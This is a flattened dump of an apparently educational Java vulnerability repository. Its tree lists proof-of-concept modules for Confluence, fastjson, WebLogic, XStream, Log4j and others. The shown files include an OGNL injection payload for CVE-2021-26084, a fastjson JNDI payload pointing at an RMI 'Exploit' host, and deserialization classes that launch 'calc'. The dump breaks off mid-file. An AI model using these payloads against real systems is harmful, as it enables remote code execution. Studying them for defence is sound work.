├── .idea ├── .gitignore ├── JavaVulnSummary.iml ├── compiler.xml ├── dataSources.xml ├── encodings.xml ├── findbugs-idea.xml ├── inspectionProfiles │ └── Project_Default.xml ├── jarRepositories.xml ├── libraries │ ├── jar_files.xml │ └── weblogic.xml ├── misc.xml ├── sonarlint │ └── issuestore │ │ ├── 1 │ │ └── 4 │ │ │ └── 14edfe89162416d49c32552d017ca837f62b9422 │ │ ├── 2 │ │ └── c │ │ │ └── 2c4f2037ecb9d27c65e2c90c0ca498ad12b50c31 │ │ ├── 4 │ │ └── 4 │ │ │ └── 442292b8a7efeabbe4cc176709b833b1792140ec │ │ ├── 9 │ │ └── 9 │ │ │ └── 99cb82bff7b56e8ffefd753a558b27e14d2d2f65 │ │ ├── c │ │ └── 2 │ │ │ └── c20815daf9879f91f4163a71209c4dbb39aad053 │ │ └── index.pb ├── sqldialects.xml ├── uiDesigner.xml └── vcs.xml ├── JavaVulnSummary.iml ├── README.md ├── common ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── r17a │ └── annotation │ └── Dependencies.java ├── confluence ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── r17a │ │ │ └── confluence │ │ │ └── velocity │ │ │ └── VelocityTest.java │ │ └── resources │ │ └── velocity │ │ ├── CVE-2021-26084.vm │ │ └── velocity_test.vm └── target │ └── classes │ ├── com │ └── r17a │ │ └── confluence │ │ └── velocity │ │ └── VelocityTest.class │ └── velocity │ ├── CVE-2021-26084.vm │ └── velocity_test.vm ├── fastjson ├── pom.xml └── src │ ├── main │ └── java │ │ └── com │ │ └── r17a │ │ └── fastjson │ │ ├── Fastjson_1_2_24.java │ │ └── Fastjson_1_2_25.java │ └── test │ └── java │ └── test │ ├── FastjsonSetterTest.java │ └── FastjsonTest.java ├── jboss ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── com │ │ └── jboss │ │ └── main │ │ ├── Payload.java │ │ ├── Test.java │ │ ├── doPost.java │ │ └── main.java └── target │ └── classes │ ├── META-INF │ └── jboss.kotlin_module │ └── com │ └── jboss │ └── main │ ├── Payload.class │ ├── Test.class │ ├── doPost.class │ ├── main$1.class │ ├── main$2.class │ ├── main$3.class │ └── main.class ├── jenkins ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── r17a │ └── jenkins │ └── CVE_2021_21677.java ├── jndi ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── com │ │ └── r17a │ │ └── jndi │ │ ├── JndiAndDns.java │ │ ├── JndiAndLdap.java │ │ ├── JndiAndRmi.java │ │ ├── ldap │ │ ├── CalcTest.java │ │ ├── LdapRefServer.java │ │ ├── LdapSerClient.java │ │ ├── LdapSerServer.java │ │ └── SerObject.java │ │ └── rmi │ │ ├── Calc.java │ │ ├── ICalc.java │ │ ├── RmiClient.java │ │ └── RmiRegisterServer.java └── target │ └── classes │ └── com │ └── r17a │ └── jndi │ ├── JndiAndDns.class │ ├── JndiAndLdap.class │ ├── JndiAndRmi.class │ ├── ldap │ ├── CalcTest.class │ ├── LdapRefServer$OperationInterceptor.class │ ├── LdapRefServer.class │ ├── LdapSerClient.class │ ├── LdapSerServer$OperationInterceptor.class │ ├── LdapSerServer.class │ └── SerObject.class │ └── rmi │ ├── Calc.class │ ├── ICalc.class │ ├── RmiClient.class │ └── RmiRegisterServer.class ├── log4j ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── r17a │ │ │ └── log4j2 │ │ │ └── cve_2021_44228 │ │ │ ├── EXP.java │ │ │ └── RCE_20211209.java │ │ └── resources │ │ └── log4j.properties └── target │ └── classes │ ├── com │ └── r17a │ │ └── log4j2 │ │ ├── EXP.class │ │ └── RCE_20211209.class │ └── log4j.properties ├── owasp ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── r17a │ │ │ └── commonvuln │ │ │ ├── cors │ │ │ └── Cors.java │ │ │ ├── file │ │ │ ├── FileDelete.java │ │ │ ├── FileUnzip.java │ │ │ └── FileUploadOrDownload.java │ │ │ ├── injection │ │ │ ├── command │ │ │ │ ├── ProcessCmdInject.java │ │ │ │ └── RuntimeCmdInject.java │ │ │ ├── expression │ │ │ │ ├── mvel │ │ │ │ │ └── MvelTest.java │ │ │ │ ├── ognl │ │ │ │ │ ├── OgnlTest.java │ │ │ │ │ └── bean │ │ │ │ │ │ ├── School.java │ │ │ │ │ │ ├── SchoolMaster.java │ │ │ │ │ │ └── Student.java │ │ │ │ └── spel │ │ │ │ │ └── SpelTest.java │ │ │ └── sqli │ │ │ │ ├── hibernate │ │ │ │ ├── HibernateSqli.java │ │ │ │ ├── pojo │ │ │ │ │ ├── User.hbm.xml │ │ │ │ │ └── User.java │ │ │ │ └── utils │ │ │ │ │ └── HibernateUtils.java │ │ │ │ ├── jdbc │ │ │ │ └── JdbcSqli.java │ │ │ │ └── mybatis │ │ │ │ ├── MybatisSqli.java │ │ │ │ ├── dao │ │ │ │ ├── UserMapper.java │ │ │ │ └── UserMapper.xml │ │ │ │ ├── pojo │ │ │ │ └── User.java │ │ │ │ └── utils │ │ │ │ └── MybatisUtils.java │ │ │ ├── securitymissconfig │ │ │ ├── securitymanager │ │ │ │ ├── BypassByClassloader.java │ │ │ │ ├── BypassByReflection.java │ │ │ │ ├── SetSecurityManagerNullBypass.java │ │ │ │ └── policy │ │ │ │ │ ├── CreatePolicy.java │ │ │ │ │ └── TestFilePolicy.java │ │ │ └── xxe │ │ │ │ ├── DocumentBuilderXXE.java │ │ │ │ ├── Payloads.java │ │ │ │ ├── SAXBuilderXXE.java │ │ │ │ ├── SAXParserFactoryXXE.java │ │ │ │ ├── SAXReadXXE.java │ │ │ │ ├── SAXTransformerFactoryXXE.java │ │ │ │ ├── TransformerFactoryXXE.java │ │ │ │ └── XXE.java │ │ │ └── ssrf │ │ │ └── Ssrf.java │ │ └── resources │ │ ├── hibernate.cfg.xml │ │ ├── imgs │ │ └── 111.png │ │ ├── mybatis-config.xml │ │ ├── tmp │ │ └── tmp │ │ └── user_db.sql └── target │ ├── classes │ ├── com │ │ └── r17a │ │ │ └── commonvuln │ │ │ ├── cors │ │ │ └── Cors.class │ │ │ ├── file │ │ │ ├── FileDelete.class │ │ │ ├── FileUnzip.class │ │ │ └── FileUploadOrDownload.class │ │ │ ├── injection │ │ │ ├── command │ │ │ │ ├── ProcessCmdInject.class │ │ │ │ └── RuntimeCmdInject.class │ │ │ ├── expression │ │ │ │ ├── mvel │ │ │ │ │ └── MvelTest.class │ │ │ │ ├── ognl │ │ │ │ │ ├── OgnlTest$1.class │ │ │ │ │ ├── OgnlTest.class │ │ │ │ │ └── bean │ │ │ │ │ │ ├── School.class │ │ │ │ │ │ ├── SchoolMaster.class │ │ │ │ │ │ └── Student.class │ │ │ │ └── spel │ │ │ │ │ └── SpelTest.class │ │ │ ├── redirect │ │ │ │ └── UrlRedirect.class │ │ │ └── sqli │ │ │ │ ├── hibernate │ │ │ │ ├── HibernateSqli.class │ │ │ │ ├── pojo │ │ │ │ │ ├── User.class │ │ │ │ │ └── User.hbm.xml │ │ │ │ └── utils │ │ │ │ │ └── HibernateUtils.class │ │ │ │ ├── jdbc │ │ │ │ └── JdbcSqli.class │ │ │ │ └── mybatis │ │ │ │ ├── MybatisSqli.class │ │ │ │ ├── dao │ │ │ │ ├── UserMapper.class │ │ │ │ └── UserMapper.xml │ │ │ │ ├── pojo │ │ │ │ └── User.class │ │ │ │ └── utils │ │ │ │ └── MybatisUtils.class │ │ │ ├── securitymissconfig │ │ │ ├── securitymanager │ │ │ │ ├── BypassByClassloader.class │ │ │ │ ├── BypassByReflection.class │ │ │ │ ├── Evil.class │ │ │ │ ├── MyClassLoader.class │ │ │ │ ├── SetSecurityManagerNullBypass.class │ │ │ │ └── policy │ │ │ │ │ ├── CreatePolicy.class │ │ │ │ │ ├── TestFilePolicy$1.class │ │ │ │ │ └── TestFilePolicy.class │ │ │ └── xxe │ │ │ │ ├── DocumentBuilderXXE.class │ │ │ │ ├── Payloads.class │ │ │ │ ├── SAXBuilderXXE.class │ │ │ │ ├── SAXHandel.class │ │ │ │ ├── SAXParserFactoryXXE.class │ │ │ │ ├── SAXReadXXE.class │ │ │ │ ├── SAXTransformerFactoryXXE.class │ │ │ │ ├── TransformerFactoryXXE.class │ │ │ │ └── XXE.class │ │ │ └── ssrf │ │ │ └── Ssrf.class │ ├── hibernate.cfg.xml │ └── mybatis-config.xml │ └── maven-status │ └── maven-compiler-plugin │ └── compile │ └── default-compile │ ├── createdFiles.lst │ └── inputFiles.lst ├── pom.xml ├── struts2 ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── r17a │ │ │ └── action │ │ │ └── IndexAction.java │ │ ├── resources │ │ └── struts.xml │ │ └── webapp │ │ ├── WEB-INF │ │ └── web.xml │ │ └── index.jsp └── target │ ├── classes │ ├── com │ │ └── r17a │ │ │ └── action │ │ │ └── IndexAction.class │ └── struts.xml │ ├── struts2.war │ └── struts2 │ ├── META-INF │ └── MANIFEST.MF │ ├── WEB-INF │ ├── classes │ │ ├── com │ │ │ └── r17a │ │ │ │ └── action │ │ │ │ └── IndexAction.class │ │ └── struts.xml │ ├── lib │ │ ├── commons-collections-3.2.2.jar │ │ ├── commons-fileupload-1.4.jar │ │ ├── commons-io-2.6.jar │ │ ├── commons-lang3-3.8.1.jar │ │ ├── freemarker-2.3.30.jar │ │ ├── javassist-3.20.0-GA.jar │ │ ├── log4j-api-2.12.1.jar │ │ ├── ognl-3.1.28.jar │ │ └── struts2-core-2.5.25.jar │ └── web.xml │ └── index.jsp ├── weblogic ├── lib │ ├── jar_files │ │ ├── aopalliance-repackaged-2.6.1.jar │ │ ├── coherence-20.12.2.jar │ │ ├── coherence-management-20.12.2.jar │ │ ├── coherence-rest.jar │ │ ├── coherence-web.jar │ │ ├── eclipselink.jar │ │ ├── hk2-api-2.6.1.jar │ │ ├── hk2-locator-2.6.1.jar │ │ ├── hk2-utils-2.6.1.jar │ │ ├── jackson-annotations-2.12.0.jar │ │ ├── jackson-core-2.12.0.jar │ │ ├── jackson-databind-2.12.0.jar │ │ ├── jackson-jaxrs-base-2.12.0.jar │ │ ├── jackson-jaxrs-json-provider-2.12.0.jar │ │ ├── jackson-module-jaxb-annotations-2.12.0.jar │ │ ├── jakarta.activation-1.2.1.jar │ │ ├── jakarta.activation-api-1.2.1.jar │ │ ├── jakarta.annotation-api-1.3.5.jar │ │ ├── jakarta.inject-2.6.1.jar │ │ ├── jakarta.validation-api-2.0.2.jar │ │ ├── jakarta.ws.rs-api-2.1.6.jar │ │ ├── jakarta.xml.bind-api-2.3.2.jar │ │ ├── javassist-3.25.0-GA.jar │ │ ├── jersey-client-2.30.1.jar │ │ ├── jersey-common-2.30.1.jar │ │ ├── jersey-entity-filtering-2.30.1.jar │ │ ├── jersey-hk2-2.30.1.jar │ │ ├── jersey-media-jaxb-2.30.1.jar │ │ ├── jersey-media-json-jackson-2.30.1.jar │ │ ├── jersey-server-2.30.1.jar │ │ ├── osgi-resource-locator-1.0.3.jar │ │ └── toplink-grid.jar │ └── weblogic │ │ ├── coherence.jar │ │ ├── commons-cli-1.4.jar │ │ ├── commons-codec-1.15.jar │ │ ├── commons-collections-3.1.jar │ │ ├── commons-httpclient-3.1.jar │ │ ├── commons-io-2.7.jar │ │ ├── commons-logging-1.2.jar │ │ ├── jsafeFIPS.jar │ │ ├── wlcipher.jar │ │ └── wlfullclient.jar ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── com │ │ ├── r17a │ │ └── weblogic │ │ │ ├── Main.java │ │ │ ├── cve │ │ │ ├── CVE_2020_14654.java │ │ │ ├── CVE_2020_14756.java │ │ │ ├── CVE_2020_14841.java │ │ │ ├── CVE_2020_2555.java │ │ │ ├── CVE_2020_2883_POC1.java │ │ │ ├── CVE_2020_2883_POC2.java │ │ │ ├── CVE_2021_2135.java │ │ │ ├── CVE_2021_2394.java │ │ │ └── ObjectPayload.java │ │ │ └── supeream │ │ │ ├── payload │ │ │ ├── PayloadTest.java │ │ │ └── RemoteImpl.java │ │ │ ├── serial │ │ │ ├── BytesOperation.java │ │ │ ├── Reflections.java │ │ │ ├── SerialDataGenerator.java │ │ │ └── Serializables.java │ │ │ ├── ssl │ │ │ ├── SocketFactory.java │ │ │ ├── TrustManagerImpl.java │ │ │ └── WeblogicTrustManager.java │ │ │ └── weblogic │ │ │ ├── BypassPayloadSelector.java │ │ │ ├── ObjectTest.java │ │ │ ├── T3ProtocolOperation.java │ │ │ ├── T3Test.java │ │ │ └── WebLogicOperation.java │ │ └── supeream │ │ ├── Main.java │ │ ├── payload │ │ ├── PayloadTest.java │ │ └── RemoteImpl.java │ │ ├── serial │ │ ├── BytesOperation.java │ │ ├── Reflections.java │ │ ├── SerialDataGenerator.java │ │ └── Serializables.java │ │ ├── ssl │ │ ├── SocketFactory.java │ │ ├── TrustManagerImpl.java │ │ └── WeblogicTrustManager.java │ │ └── weblogic │ │ ├── BypassPayloadSelector.java │ │ ├── ObjectTest.java │ │ ├── T3ProtocolOperation.java │ │ ├── T3Test.java │ │ └── WebLogicOperation.java └── target │ └── classes │ └── com │ ├── r17a │ └── weblogic │ │ ├── Main.class │ │ ├── cve │ │ ├── CVE_2020_14654.class │ │ ├── CVE_2020_14756.class │ │ ├── CVE_2020_14841.class │ │ ├── CVE_2020_2555.class │ │ ├── CVE_2020_2883_POC1.class │ │ ├── CVE_2020_2883_POC2.class │ │ ├── CVE_2021_2135.class │ │ ├── CVE_2021_2394.class │ │ └── ObjectPayload.class │ │ └── supeream │ │ ├── payload │ │ ├── PayloadTest.class │ │ └── RemoteImpl.class │ │ ├── serial │ │ ├── BytesOperation.class │ │ ├── Reflections.class │ │ ├── SerialDataGenerator.class │ │ └── Serializables.class │ │ ├── ssl │ │ ├── SocketFactory.class │ │ ├── TrustManagerImpl.class │ │ └── WeblogicTrustManager.class │ │ └── weblogic │ │ ├── BypassPayloadSelector.class │ │ ├── ObjectTest.class │ │ ├── T3ProtocolOperation.class │ │ ├── T3Test.class │ │ └── WebLogicOperation.class │ └── supeream │ ├── Main.class │ ├── payload │ ├── PayloadTest.class │ └── RemoteImpl.class │ ├── serial │ ├── BytesOperation.class │ ├── Reflections.class │ ├── SerialDataGenerator.class │ └── Serializables.class │ ├── ssl │ ├── SocketFactory.class │ ├── TrustManagerImpl.class │ └── WeblogicTrustManager.class │ └── weblogic │ ├── BypassPayloadSelector.class │ ├── ObjectTest.class │ ├── T3ProtocolOperation.class │ ├── T3Test.class │ └── WebLogicOperation.class ├── xstream ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── com │ │ └── r17a │ │ └── xstream │ │ ├── cve │ │ ├── eventlistenerlist │ │ │ └── CVE_2021_39151.java │ │ ├── hashmap │ │ │ ├── CVE_2020_26217.java │ │ │ └── CVE_2021_39152.java │ │ ├── linkedhashset │ │ │ ├── CVE_2021_39139.java │ │ │ ├── CVE_2021_39140.java │ │ │ └── CVE_2021_39149.java │ │ ├── priorityqueue │ │ │ ├── CVE_2021_21344.java │ │ │ ├── CVE_2021_21345.java │ │ │ ├── CVE_2021_39141.java │ │ │ ├── CVE_2021_39144.java │ │ │ ├── CVE_2021_39145.java │ │ │ ├── CVE_2021_39150.java │ │ │ ├── CVE_2021_39153.java │ │ │ └── test.java │ │ └── sortedset │ │ │ ├── CVE_2019_10173.java │ │ │ ├── CVE_2021_39146.java │ │ │ ├── CVE_2021_39147.java │ │ │ ├── CVE_2021_39148.java │ │ │ └── CVE_2021_39154.java │ │ └── test │ │ ├── School.java │ │ ├── Student.java │ │ └── Test.java └── target │ └── classes │ └── com │ └── r17a │ └── xstream │ ├── cve │ ├── eventlistenerlist │ │ └── CVE_2021_39151.class │ ├── hashmap │ │ ├── CVE_2020_26217.class │ │ └── CVE_2021_39152.class │ ├── linkedhashset │ │ ├── CVE_2021_39139.class │ │ ├── CVE_2021_39140.class │ │ └── CVE_2021_39149.class │ ├── priorityqueue │ │ ├── CVE_2021_21344.class │ │ ├── CVE_2021_21345.class │ │ ├── CVE_2021_39141.class │ │ ├── CVE_2021_39144.class │ │ ├── CVE_2021_39145.class │ │ ├── CVE_2021_39150.class │ │ ├── CVE_2021_39153.class │ │ └── test.class │ └── sortedset │ │ ├── CVE_2019_10173.class │ │ ├── CVE_2021_39146.class │ │ ├── CVE_2021_39147.class │ │ ├── CVE_2021_39148.class │ │ └── CVE_2021_39154.class │ └── test │ ├── ImpTest.class │ ├── School.class │ ├── Student.class │ ├── Test$1.class │ ├── Test.class │ └── TestInterface.class └── ysoserial ├── pom.xml └── src └── main └── java └── com └── r17a └── ysoserial ├── BeanShell1.java ├── CommonsBeanutils1.java ├── CommonsCollections2.java ├── CommonsCollections4.java ├── Jython1.java └── jdk7u21 ├── HashBruteTest.java ├── Poc.java └── TestTmp.java /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /.idea/JavaVulnSummary.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.idea/compiler.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /.idea/dataSources.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | mysql.8 6 | true 7 | com.mysql.cj.jdbc.Driver 8 | jdbc:mysql://localhost:3306/users 9 | 10 | 11 | -------------------------------------------------------------------------------- /.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /.idea/findbugs-idea.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 36 | -------------------------------------------------------------------------------- /.idea/jarRepositories.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 | 14 | 15 | 19 | 20 | -------------------------------------------------------------------------------- /.idea/libraries/jar_files.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.idea/libraries/weblogic.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 10 | 11 | 16 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/1/4/14edfe89162416d49c32552d017ca837f62b9422: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/.idea/sonarlint/issuestore/1/4/14edfe89162416d49c32552d017ca837f62b9422 -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/2/c/2c4f2037ecb9d27c65e2c90c0ca498ad12b50c31: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/.idea/sonarlint/issuestore/2/c/2c4f2037ecb9d27c65e2c90c0ca498ad12b50c31 -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/4/4/442292b8a7efeabbe4cc176709b833b1792140ec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/.idea/sonarlint/issuestore/4/4/442292b8a7efeabbe4cc176709b833b1792140ec -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/9/9/99cb82bff7b56e8ffefd753a558b27e14d2d2f65: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/.idea/sonarlint/issuestore/9/9/99cb82bff7b56e8ffefd753a558b27e14d2d2f65 -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/c/2/c20815daf9879f91f4163a71209c4dbb39aad053: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/.idea/sonarlint/issuestore/c/2/c20815daf9879f91f4163a71209c4dbb39aad053 -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/index.pb: -------------------------------------------------------------------------------- 1 | 2 |  3 | Oowasp/src/main/java/com/r17a/commonvuln/injection/command/ProcessCmdInject.java,1\4\14edfe89162416d49c32552d017ca837f62b9422 4 | = 5 | owasp/pom.xml,2\c\2c4f2037ecb9d27c65e2c90c0ca498ad12b50c31 6 | 7 7 | pom.xml,4\4\442292b8a7efeabbe4cc176709b833b1792140ec 8 | g 9 | 7weblogic/src/main/java/com/r17a/cve/CVE_2020_14654.java,9\9\99cb82bff7b56e8ffefd753a558b27e14d2d2f65 10 |  11 | Oowasp/src/main/java/com/r17a/commonvuln/injection/command/RuntimeCmdInject.java,c\2\c20815daf9879f91f4163a71209c4dbb39aad053 -------------------------------------------------------------------------------- /.idea/sqldialects.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /JavaVulnSummary.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /common/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | common 13 | 14 | 15 | -------------------------------------------------------------------------------- /common/src/main/java/com/r17a/annotation/Dependencies.java: -------------------------------------------------------------------------------- 1 | package com.r17a.annotation; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | import java.lang.reflect.AnnotatedElement; 8 | 9 | @Target(ElementType.TYPE) 10 | @Retention(RetentionPolicy.RUNTIME) 11 | public @interface Dependencies { 12 | String[] value() default {}; 13 | 14 | public static class Utils { 15 | public static String[] getDependencies(AnnotatedElement annotated) { 16 | Dependencies deps = annotated.getAnnotation(Dependencies.class); 17 | if (deps != null && deps.value() != null) { 18 | return deps.value(); 19 | } else { 20 | return new String[0]; 21 | } 22 | } 23 | 24 | public static String[] getDependenciesSimple(AnnotatedElement annotated) { 25 | String[] deps = getDependencies(annotated); 26 | String[] simple = new String[deps.length]; 27 | for (int i = 0; i < simple.length; i++) { 28 | simple[i] = deps[i].split(":", 2)[1]; 29 | } 30 | return simple; 31 | } 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /confluence/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | confluence 13 | 14 | 15 | 16 | org.apache.velocity 17 | velocity 18 | 1.7 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /confluence/src/main/java/com/r17a/confluence/velocity/VelocityTest.java: -------------------------------------------------------------------------------- 1 | package com.r17a.confluence.velocity; 2 | 3 | import org.apache.velocity.Template; 4 | import org.apache.velocity.VelocityContext; 5 | import org.apache.velocity.app.VelocityEngine; 6 | import java.io.StringWriter; 7 | 8 | 9 | public class VelocityTest { 10 | public static void main(String[] args) { 11 | VelocityEngine velocityEngine = new VelocityEngine(); 12 | //加载classpath resources目录下的文件 13 | velocityEngine.setProperty("file.resource.loader.class", "org.apache.velocity.runtime.resource.loader.ClasspathResourceLoader"); 14 | 15 | VelocityContext context = new VelocityContext(); 16 | context.put("value1", "\u0027"); 17 | context.put("value2", null); 18 | 19 | // 获取模板文件传递数据完成渲染 20 | Template template = velocityEngine.getTemplate("velocity/velocity_test.vm"); 21 | StringWriter stringWriter = new StringWriter(); 22 | template.merge(context, stringWriter); 23 | System.out.println(stringWriter); 24 | } 25 | } -------------------------------------------------------------------------------- /confluence/src/main/resources/velocity/CVE-2021-26084.vm: -------------------------------------------------------------------------------- 1 | #tag ("Hidden" "name='queryString'" "value='aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022touch /tmp/success\u0022)}%2b\u0027'") -------------------------------------------------------------------------------- /confluence/src/main/resources/velocity/velocity_test.vm: -------------------------------------------------------------------------------- 1 | velocity test: 2 | #set ($value="aaaaa") 3 | value is '$value' 4 | value1 is "$value1" 5 | value2 is "$!value2" 6 | -------------------------------------------------------------------------------- /confluence/target/classes/com/r17a/confluence/velocity/VelocityTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/confluence/target/classes/com/r17a/confluence/velocity/VelocityTest.class -------------------------------------------------------------------------------- /confluence/target/classes/velocity/CVE-2021-26084.vm: -------------------------------------------------------------------------------- 1 | #tag ("Hidden" "name='queryString'" "value='aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022touch /tmp/success\u0022)}%2b\u0027'") -------------------------------------------------------------------------------- /confluence/target/classes/velocity/velocity_test.vm: -------------------------------------------------------------------------------- 1 | velocity test: 2 | #set ($value="aaaaa") 3 | value is '$value' 4 | value1 is "$value1" 5 | value2 is "$!value2" -------------------------------------------------------------------------------- /fastjson/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | fastjson 13 | 14 | 15 | com.r17a 16 | common 17 | 1.0-SNAPSHOT 18 | compile 19 | 20 | 21 | 22 | com.alibaba 23 | fastjson 24 | 1.2.24 25 | 26 | 27 | javassist 28 | javassist 29 | 3.12.1.GA 30 | compile 31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/r17a/fastjson/Fastjson_1_2_25.java: -------------------------------------------------------------------------------- 1 | package com.r17a.fastjson; 2 | 3 | import com.r17a.annotation.Dependencies; 4 | import com.alibaba.fastjson.JSON; 5 | 6 | import java.io.IOException; 7 | 8 | @Dependencies({ "com.alibaba.:fastjson:1.2.25" }) 9 | //TODO 修改pom.xml中的依赖版本 10 | // 11 | // com.alibaba 12 | // fastjson 13 | // 1.2.25 14 | // 15 | 16 | public class Fastjson_1_2_25 { 17 | public static void main(String[] args) { 18 | // 反序列化一个fastjson.test.T1对象 19 | // 1.2.25及以后版本加入了checkAutoType()函数的校验, 20 | String text = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\", \"dataSourceName\":\"rmi://localhost:1099/Exploit\", \"autoCommit\":true}"; 21 | Object object = JSON.parseObject(text); 22 | System.out.println(object); 23 | } 24 | } 25 | 26 | class T2 { 27 | public T2() throws IOException { 28 | Runtime.getRuntime().exec("calc"); 29 | } 30 | } -------------------------------------------------------------------------------- /fastjson/src/test/java/test/FastjsonSetterTest.java: -------------------------------------------------------------------------------- 1 | package test; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.JSONObject; 5 | 6 | import java.io.IOException; 7 | 8 | public class FastjsonSetterTest { 9 | public static void main(String[] args) { 10 | // Test calc = new Test("calc"); 11 | // String s = JSON.toJSONString(calc); 12 | // System.out.println(s); 13 | // Test jsonObject = JSON.parseObject(s, Test.class); 14 | // System.out.println(jsonObject.toString()); 15 | String s1 = "{\"@type\":\"test.Test\",\"cmd\":\"calc\"}"; 16 | JSONObject jsonObject1 = JSON.parseObject(s1); 17 | System.out.println(jsonObject1); 18 | } 19 | 20 | 21 | } 22 | 23 | 24 | class Test { 25 | public String cmd; 26 | 27 | Test() { 28 | try { 29 | Runtime.getRuntime().exec("calc"); 30 | } catch (IOException e) { 31 | e.printStackTrace(); 32 | } 33 | } 34 | 35 | public Test(String cmd) { 36 | this.cmd = cmd; 37 | } 38 | 39 | public String getCmd() { 40 | return cmd; 41 | } 42 | 43 | public void setCmd(String cmd) { 44 | System.out.println("setCmd..."); 45 | this.cmd = cmd; 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /fastjson/src/test/java/test/FastjsonTest.java: -------------------------------------------------------------------------------- 1 | package test; 2 | 3 | import java.io.IOException; 4 | import com.alibaba.fastjson.JSON; 5 | 6 | public class FastjsonTest { 7 | public static void main(String[] args) { 8 | POJO calc = new POJO("calc"); 9 | String s = JSON.toJSONString(calc); 10 | System.out.println(s); 11 | POJO jsonObject = JSON.parseObject(s, POJO.class); 12 | System.out.println(jsonObject.toString()); 13 | } 14 | 15 | 16 | } 17 | 18 | class POJO { 19 | public String cmd; 20 | 21 | POJO(){ 22 | try { 23 | Runtime.getRuntime().exec("calc"); 24 | } catch (IOException e) { 25 | e.printStackTrace(); 26 | } 27 | } 28 | 29 | public POJO(String cmd) { 30 | this.cmd = cmd; 31 | try { 32 | Runtime.getRuntime().exec(this.cmd); 33 | } catch (IOException e) { 34 | e.printStackTrace(); 35 | } 36 | } 37 